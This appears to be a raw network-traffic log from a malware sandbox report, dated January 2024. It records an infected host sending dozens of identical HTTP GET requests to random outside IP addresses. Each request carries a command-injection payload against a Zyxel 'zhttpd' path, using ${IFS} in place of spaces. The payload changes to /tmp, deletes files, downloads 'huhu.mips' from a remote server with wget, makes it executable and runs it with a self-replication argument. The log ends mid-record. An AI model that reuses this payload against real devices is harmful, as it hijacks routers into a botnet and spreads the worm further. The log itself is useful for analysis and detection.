                                      Jan 19, 2024 17:29:38.898647070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5879192.168.2.145545862.191.118.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898684978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5880192.168.2.1452732206.0.245.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898711920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5881192.168.2.145188225.148.228.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898766041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5882192.168.2.143594646.37.185.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898791075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5883192.168.2.144490674.175.29.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898824930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5884192.168.2.144962691.31.159.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898890972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5885192.168.2.145951899.80.175.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898920059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5886192.168.2.1442838133.42.131.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898952961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5887192.168.2.1433546198.222.110.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.898996115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5888192.168.2.1455848155.104.11.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899063110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5889192.168.2.1457758166.8.109.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899090052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5890192.168.2.1459068200.179.63.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899120092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5891192.168.2.1443220176.73.194.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899146080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5892192.168.2.145746694.56.1.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899192095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5893192.168.2.1453196116.218.253.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899225950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5894192.168.2.144324050.4.60.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899266958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5895192.168.2.145285494.28.233.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899293900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5896192.168.2.1444676200.33.213.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899333000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5897192.168.2.144006270.158.40.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899384022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5898192.168.2.1438678172.226.225.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899416924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5899192.168.2.144983885.1.73.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899470091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5900192.168.2.145494696.175.156.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899511099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5901192.168.2.1454830155.226.100.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899549007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5902192.168.2.1450396207.159.239.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899597883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5903192.168.2.1450802103.234.67.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899648905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5904192.168.2.1449180179.189.117.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899676085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5905192.168.2.1456548152.103.248.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899698973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5906192.168.2.144292046.242.241.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899760008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5907192.168.2.1451524173.138.242.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899816036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5908192.168.2.143462457.137.37.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899852037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5909192.168.2.1460814206.148.184.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899890900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5910192.168.2.145098846.187.176.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899914026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5911192.168.2.1433836169.102.124.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899957895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5912192.168.2.144886657.159.153.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.899998903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5913192.168.2.145036698.255.173.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900063038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5914192.168.2.1439972137.139.151.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900103092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5915192.168.2.1446154157.161.93.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900136948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5916192.168.2.144046484.109.168.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900170088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5917192.168.2.144764863.8.208.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900229931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5918192.168.2.145630212.216.41.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900275946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5919192.168.2.145035236.42.121.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900317907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5920192.168.2.1447896167.77.59.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900368929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5921192.168.2.145857657.211.127.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900388002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5922192.168.2.1457564104.76.83.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900477886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5923192.168.2.1459052162.50.244.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900511026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5924192.168.2.145553663.36.201.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900557041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5925192.168.2.145420247.97.237.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900587082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5926192.168.2.144979279.77.223.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900619030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5927192.168.2.1436190152.86.250.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900667906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5928192.168.2.144548857.97.212.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900702000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5929192.168.2.1444038136.15.196.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900738955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5930192.168.2.1442956165.209.184.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900790930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5931192.168.2.143546097.0.59.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900829077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5932192.168.2.146041038.140.136.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900871992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5933192.168.2.145632844.58.53.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900918007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5934192.168.2.1446866205.36.176.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.900959969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5935192.168.2.1443502157.179.149.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901001930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5936192.168.2.1441944197.168.102.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901051998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5937192.168.2.1440074126.72.96.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901088953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5938192.168.2.1442320162.34.27.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901129007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5939192.168.2.1437112120.71.47.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901163101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5940192.168.2.1453822148.185.232.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901227951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5941192.168.2.1453258149.124.15.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901259899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5942192.168.2.145859490.46.78.173443
                                      TimestampBytes transferredDirectionData
